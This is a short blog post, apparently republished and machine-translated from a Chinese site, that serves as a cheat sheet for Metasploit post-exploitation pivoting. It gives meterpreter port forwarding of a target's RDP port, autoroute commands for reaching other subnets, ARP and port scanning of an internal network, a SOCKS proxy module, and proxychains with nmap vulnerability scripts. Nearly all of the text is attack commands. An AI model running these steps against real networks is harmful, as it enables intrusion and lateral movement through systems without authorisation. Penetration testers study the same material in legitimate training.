当前位置:网站首页>MSF horizontal MSF port forwarding + routing table +socks5+proxychains

MSF horizontal MSF port forwarding + routing table +socks5+proxychains

2022-07-06 17:58:00 West Lake first sword

MSF Some operations of post infiltration
Port forwarding

meterpreter > portfwd  add -l 2222 -r 172.16.1.156 -p 3389 # Put the target machine 172.16.1.156 Of 3389 Port forwarding to local 2222 port 
meterpreter > portfwd list	# View the forwarding list 
meterpreter > portfwd flush	# Clear the forwarding list 

rdesktop 127.0.0.1:2222    #kali Remote desktop use 2222 port 

Add route , Lateral penetration ( Cross segment attack )

run autoroute -s 172.16.2.0/24  # Add to target environment network 
run autoroute –p          # View added routes 
route print 	# Print route 

run post/windows/gather/arp_scanner RHOSTS=172.16.2.0/24  # Scan the whole segment 

run auxiliary/scanner/portscan/tcp RHOSTS=172.16.2.11 PORTS=3389  # Check IP Whether open 3389

utilize arp Scan intranet hosts

use post/windows/gather/arp_scanner
set rhosts 172.16.2.0/24
set session 1
exploit

Socks Agency
New version of the msf Different from the old version , The agent module is also different .
auxiliary/server/socks_proxy

msf6 auxiliary(server/socks_proxy) > set srvport 7777
srvport => 7777
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server

To configure proxychains
Use agent software to connect established socks Tunnel , You can successfully access the intranet .

vi /etc/proxychains.conf # add to  socks5 127.0.0.1 7777

proxychains+nmap Scan the host for vulnerabilities

proxychains nmap -sT -Pn -p445 --script=vuln 192.168.52.141

proxychains Use msf frame

proxychains msfconsole

原网站

版权声明
本文为[West Lake first sword]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/187/202207061001100340.html